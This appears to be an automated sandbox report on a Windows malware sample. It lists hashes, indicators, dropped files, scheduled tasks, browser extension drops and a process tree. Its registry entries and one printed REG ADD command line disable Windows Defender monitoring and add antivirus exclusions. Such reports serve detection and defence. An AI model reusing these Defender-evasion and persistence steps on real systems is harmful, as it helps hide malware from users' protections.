Analysis
-
max time kernel
130s -
max time network
133s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
21/12/2022, 23:12
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
af4b0579dbd73bb73e0a4da2f7a36bad
-
SHA1
6e7d46ba38fbc9ceab466212869a4d6da010f974
-
SHA256
19b89cddf3612d7cee0049b3cf3250e9e45e9a411afa9b6bea498287e542b1da
-
SHA512
a70370e8af938cddc3b6a86adac4c2e0d2cc3d1463cda745c6671636b02f2bac85b58ffb324a532179609f2e799c546b837bb9f3a5a6da8d8886f240aea0817e
-
SSDEEP
98304:91OBdrk7Vi0P6cuTjubv8XjJxVWbk1Nhgwc1laoh0JHQkTAoA4tqpkdxKRYdyo4k:91ObYw0CIEXWktbc1lQJHQinQUsY1LdZ
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LJVhNoouCIYvC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fFIwvsLyPfUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dZAkCesbbUKSZxso = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dZAkCesbbUKSZxso = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nNTpTrwDNnPU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nNTpTrwDNnPU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LJVhNoouCIYvC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xPPqLUFFU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\STCeEXnoOCFBHvVB = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\STCeEXnoOCFBHvVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dZAkCesbbUKSZxso = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fFIwvsLyPfUn = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dZAkCesbbUKSZxso = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xPPqLUFFU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 968 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1268 Install.exe 2020 Install.exe 912 eNUyhHr.exe 1012 SjWRJjG.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Control Panel\International\Geo\Nation SjWRJjG.exe -
Loads dropped DLL 12 IoCs
pid Process 1744 file.exe 1268 Install.exe 1268 Install.exe 1268 Install.exe 1268 Install.exe 2020 Install.exe 2020 Install.exe 2020 Install.exe 968 rundll32.exe 968 rundll32.exe 968 rundll32.exe 968 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json SjWRJjG.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA SjWRJjG.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol SjWRJjG.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA SjWRJjG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA SjWRJjG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA SjWRJjG.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini eNUyhHr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat SjWRJjG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D SjWRJjG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 SjWRJjG.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol eNUyhHr.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol eNUyhHr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D SjWRJjG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 SjWRJjG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\xPPqLUFFU\eTcBogV.xml SjWRJjG.exe File created C:\Program Files (x86)\nNTpTrwDNnPU2\xWJWLDgnaGvaj.dll SjWRJjG.exe File created C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR\lSGrmhw.xml SjWRJjG.exe File created C:\Program Files (x86)\LJVhNoouCIYvC\KbkEwSz.xml SjWRJjG.exe File created C:\Program Files (x86)\xPPqLUFFU\WWDnGa.dll SjWRJjG.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak SjWRJjG.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja SjWRJjG.exe File created C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR\oPTaoie.dll SjWRJjG.exe File created C:\Program Files (x86)\LJVhNoouCIYvC\fQugacY.dll SjWRJjG.exe File created C:\Program Files (x86)\fFIwvsLyPfUn\VKysnWo.dll SjWRJjG.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi SjWRJjG.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi SjWRJjG.exe File created C:\Program Files (x86)\nNTpTrwDNnPU2\ZbHLfpY.xml SjWRJjG.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bcmBoHFysFBidtSprQ.job schtasks.exe File created C:\Windows\Tasks\yTojJpVlyxZWLIphK.job schtasks.exe File created C:\Windows\Tasks\mvThVpxzbhgVRbG.job schtasks.exe File created C:\Windows\Tasks\diAnMdtAazTJxxqKi.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1964 schtasks.exe 588 schtasks.exe 1968 schtasks.exe 328 schtasks.exe 112 schtasks.exe 564 schtasks.exe 564 schtasks.exe 1908 schtasks.exe 1196 schtasks.exe 1556 schtasks.exe 552 schtasks.exe 520 schtasks.exe 1380 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 SjWRJjG.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ca-43-42-c5-f1-46\WpadDecision = "0" SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root SjWRJjG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ca-43-42-c5-f1-46\WpadDetectedUrl rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ca-43-42-c5-f1-46\WpadDecisionReason = "1" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" SjWRJjG.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ca-43-42-c5-f1-46\WpadDecisionTime = b06884509a15d901 SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ca-43-42-c5-f1-46 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0039000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 SjWRJjG.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{55DA566E-E62E-4E26-BD7D-7408963BC9CC}\WpadDecisionReason = "1" SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs SjWRJjG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{55DA566E-E62E-4E26-BD7D-7408963BC9CC}\WpadDecision = "0" SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates SjWRJjG.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{55DA566E-E62E-4E26-BD7D-7408963BC9CC}\WpadDecisionTime = b06884509a15d901 SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs SjWRJjG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates SjWRJjG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0039000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs SjWRJjG.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ca-43-42-c5-f1-46 SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs SjWRJjG.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings SjWRJjG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{55DA566E-E62E-4E26-BD7D-7408963BC9CC}\WpadNetworkName = "Network 2" SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs SjWRJjG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust SjWRJjG.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ca-43-42-c5-f1-46\WpadDecision = "0" rundll32.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1712 powershell.EXE 1712 powershell.EXE 1712 powershell.EXE 1360 powershell.EXE 1360 powershell.EXE 1360 powershell.EXE 1784 powershell.EXE 1784 powershell.EXE 1784 powershell.EXE 1688 powershell.EXE 1688 powershell.EXE 1688 powershell.EXE 1012 SjWRJjG.exe 1012 SjWRJjG.exe 1012 SjWRJjG.exe 1012 SjWRJjG.exe 1012 SjWRJjG.exe 1012 SjWRJjG.exe 1012 SjWRJjG.exe 1012 SjWRJjG.exe 1012 SjWRJjG.exe 1012 SjWRJjG.exe 1012 SjWRJjG.exe 1012 SjWRJjG.exe 1012 SjWRJjG.exe 1012 SjWRJjG.exe 1012 SjWRJjG.exe 1012 SjWRJjG.exe 1012 SjWRJjG.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1712 powershell.EXE Token: SeDebugPrivilege 1360 powershell.EXE Token: SeDebugPrivilege 1784 powershell.EXE Token: SeDebugPrivilege 1688 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1744 wrote to memory of 1268 1744 file.exe 28 PID 1744 wrote to memory of 1268 1744 file.exe 28 PID 1744 wrote to memory of 1268 1744 file.exe 28 PID 1744 wrote to memory of 1268 1744 file.exe 28 PID 1744 wrote to memory of 1268 1744 file.exe 28 PID 1744 wrote to memory of 1268 1744 file.exe 28 PID 1744 wrote to memory of 1268 1744 file.exe 28 PID 1268 wrote to memory of 2020 1268 Install.exe 29 PID 1268 wrote to memory of 2020 1268 Install.exe 29 PID 1268 wrote to memory of 2020 1268 Install.exe 29 PID 1268 wrote to memory of 2020 1268 Install.exe 29 PID 1268 wrote to memory of 2020 1268 Install.exe 29 PID 1268 wrote to memory of 2020 1268 Install.exe 29 PID 1268 wrote to memory of 2020 1268 Install.exe 29 PID 2020 wrote to memory of 1104 2020 Install.exe 31 PID 2020 wrote to memory of 1104 2020 Install.exe 31 PID 2020 wrote to memory of 1104 2020 Install.exe 31 PID 2020 wrote to memory of 1104 2020 Install.exe 31 PID 2020 wrote to memory of 1104 2020 Install.exe 31 PID 2020 wrote to memory of 1104 2020 Install.exe 31 PID 2020 wrote to memory of 1104 2020 Install.exe 31 PID 2020 wrote to memory of 616 2020 Install.exe 33 PID 2020 wrote to memory of 616 2020 Install.exe 33 PID 2020 wrote to memory of 616 2020 Install.exe 33 PID 2020 wrote to memory of 616 2020 Install.exe 33 PID 2020 wrote to memory of 616 2020 Install.exe 33 PID 2020 wrote to memory of 616 2020 Install.exe 33 PID 2020 wrote to memory of 616 2020 Install.exe 33 PID 1104 wrote to memory of 944 1104 forfiles.exe 35 PID 1104 wrote to memory of 944 1104 forfiles.exe 35 PID 1104 wrote to memory of 944 1104 forfiles.exe 35 PID 1104 wrote to memory of 944 1104 forfiles.exe 35 PID 1104 wrote to memory of 944 1104 forfiles.exe 35 PID 1104 wrote to memory of 944 1104 forfiles.exe 35 PID 1104 wrote to memory of 944 1104 forfiles.exe 35 PID 944 wrote to memory of 1316 944 cmd.exe 36 PID 944 wrote to memory of 1316 944 cmd.exe 36 PID 944 wrote to memory of 1316 944 cmd.exe 36 PID 944 wrote to memory of 1316 944 cmd.exe 36 PID 944 wrote to memory of 1316 944 cmd.exe 36 PID 944 wrote to memory of 1316 944 cmd.exe 36 PID 944 wrote to memory of 1316 944 cmd.exe 36 PID 616 wrote to memory of 1520 616 forfiles.exe 37 PID 616 wrote to memory of 1520 616 forfiles.exe 37 PID 616 wrote to memory of 1520 616 forfiles.exe 37 PID 616 wrote to memory of 1520 616 forfiles.exe 37 PID 616 wrote to memory of 1520 616 forfiles.exe 37 PID 616 wrote to memory of 1520 616 forfiles.exe 37 PID 616 wrote to memory of 1520 616 forfiles.exe 37 PID 944 wrote to memory of 912 944 cmd.exe 38 PID 944 wrote to memory of 912 944 cmd.exe 38 PID 944 wrote to memory of 912 944 cmd.exe 38 PID 944 wrote to memory of 912 944 cmd.exe 38 PID 944 wrote to memory of 912 944 cmd.exe 38 PID 944 wrote to memory of 912 944 cmd.exe 38 PID 944 wrote to memory of 912 944 cmd.exe 38 PID 1520 wrote to memory of 1784 1520 cmd.exe 39 PID 1520 wrote to memory of 1784 1520 cmd.exe 39 PID 1520 wrote to memory of 1784 1520 cmd.exe 39 PID 1520 wrote to memory of 1784 1520 cmd.exe 39 PID 1520 wrote to memory of 1784 1520 cmd.exe 39 PID 1520 wrote to memory of 1784 1520 cmd.exe 39 PID 1520 wrote to memory of 1784 1520 cmd.exe 39 PID 1520 wrote to memory of 1508 1520 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\7zS5DB.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Users\Admin\AppData\Local\Temp\7zS11DC.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1104 -
